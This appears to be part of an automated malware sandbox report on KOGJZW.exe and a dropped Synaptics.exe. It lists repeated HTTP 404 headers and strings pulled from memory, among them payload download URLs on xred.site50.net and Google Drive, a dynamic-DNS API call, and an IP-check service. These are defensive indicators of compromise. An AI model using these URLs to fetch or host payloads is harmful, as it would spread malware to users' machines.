Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6uOR0ZAOCtdAS0LniFhZHDrTbpPSXp7NYr92exU2p90EV8Mi9LnzJOPbfnlLuVHctCContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:44 GMTPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-oQ7XohV5ZYVJ_zZ6SJLZ2A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4aMObmuy-kLXacJXnNGn1r_MTEtzOHREfFdIWqL_cM8Q5bVfNKXTTd1pP2nAUgn5Dfu5SRSMkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:45 GMTPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-q5KZx4rxCzDeZB-O1Z23RQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4zlw6neSSWE50N0MH7qrf1oplXpqOv8ftYMPgI7d49yPn4sGjsWECJ7Nvg_L5mhylfSbHDhg4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:48 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-UmrAe5BPqU_AGRZKkqlYBQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5Q7IX9VcQ-wD5o0lLa89OIu6iVsjmfnJ-X4mPaRBYb1QpOTd2k_A3tW8VyCKH2USPMRqOKR5AContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:48 GMTPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-pEKc4dlj7xT2I3fVH8-ICw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4n53NrNrBA21Sa1GHwIvIirBSokl9YJr-ED-XmqtUgFgSu6b6bOI3kk9MXsgpJSO0SlgO6FQUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:49 GMTPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-KolNUj-VPaWOr05Yjfibig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4w-EUbVS3hrBH9LWrhSX6TxUqMCafXZDoP-jKXqVBBxb0UUevl_4MbPFzSVOw-Dbg5tY70dbgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:49 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-jJxCKgU0jX_J0nqL6hL6qg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4yK_mOZ6Bk2F2bEEUJBMeWAj6si9Jgc3S4uiZugiTM91O3ASjP_NhtceWOLXMKcTHqdSdI0FcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:56 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-GYN2fPBI_YFU4zRTcutHaw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC72XH8rNJI42Z2qTE531bps1biXVwQYs_jjhHCiBCWw18z6_ROnxg0k5qUl5zUyzv5fQy8tXFkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:56 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-zp2mLjBNt7KbIzCZkaySEQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close

Source: KOGJZW.exe	String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
Source: Synaptics.exe, 00000003.00000002.1735541837.000000000050A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978J
Source: KOGJZW.exe, 00000000.00000003.1335354251.0000000002420000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978x
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601593603.0000000004166000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-score.com/checkip/
Source: KOGJZW.exe, 00000000.00000003.1335354251.0000000002420000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dlD
Source: KOGJZW.exe	String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
Source: Synaptics.exe, 00000003.00000002.1736544630.0000000002180000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
Source: KOGJZW.exe	String found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
Source: Synaptics.exe, 00000003.00000002.1736544630.0000000002180000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
Source: KOGJZW.exe	String found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
Source: Synaptics.exe, 00000003.00000002.1736544630.0000000002180000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
Source: KOGJZW.exe, 00000000.00000003.1335354251.0000000002420000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/Synaptics.rarh
Source: Synaptics.exe, 00000003.00000002.1738664470.000000000530A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.000000000050A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1738664470.00000000052A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/
Source: Synaptics.exe, 00000003.00000002.1765154169.000000000AA7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1794816357.000000001557E000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0;
Source: KOGJZW.exe, 00000000.00000003.1335354251.0000000002420000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
Source: KOGJZW.exe	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
Source: Synaptics.exe, 00000003.00000002.1736544630.0000000002180000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
Source: KOGJZW.exe, 00000000.00000003.1335354251.0000000002420000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
Source: KOGJZW.exe	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1738664470.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#0
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#4a9Y
Source: Synaptics.exe, 00000003.00000002.1771384181.000000000E192000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1738664470.0000000005337000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%)l8$
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%3o:
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%g
Source: Synaptics.exe, 00000003.00000002.1738664470.00000000052A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%v
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&
Source: Synaptics.exe, 00000003.00000002.1771384181.000000000E192000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(4Z9Z
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)7X:
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)G
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)c
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1738664470.0000000005337000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-2g;
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-D
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-f
Source: Synaptics.exe, 00000003.00000002.1738664470.00000000052A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-i
Source: Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
Source: Synaptics.exe, 00000003.00000002.1769316443.000000000E048000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.A
Source: Synaptics.exe, 00000003.00000002.1769316443.000000000E048000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.cVC
Source: Synaptics.exe, 00000003.00000002.1738664470.00000000052A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.com
Source: Synaptics.exe, 00000003.00000002.1735541837.000000000054D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.goog-V
Source: Synaptics.exe, 00000003.00000002.1735541837.000000000054D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.goog3V
Source: Synaptics.exe, 00000003.00000002.1738664470.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/e
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
Source: Synaptics.exe, 00000003.00000002.1738664470.00000000052A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download00
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download03r:
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0g
Source: Synaptics.exe, 00000003.00000002.1738664470.00000000052A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0v
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
Source: Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download150x;
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1D
Source: Synaptics.exe, 00000003.00000002.1738664470.0000000005333000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1n_
Source: Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
Source: Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2)
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download29
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2b
Source: Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download32q;)
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3f
Source: Synaptics.exe, 00000003.00000002.1771384181.000000000E192000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4
Source: Synaptics.exe, 00000003.00000002.1735541837.000000000054D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download41638
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4a
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000070A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.000000000719D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1744350612.00000000070EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5
Source: Synaptics.exe, 00000003.00000002.1744350612.00000000071C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5(
Source: Synaptics.exe, 00000003.00000002.1770191710.000000000E0D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5E
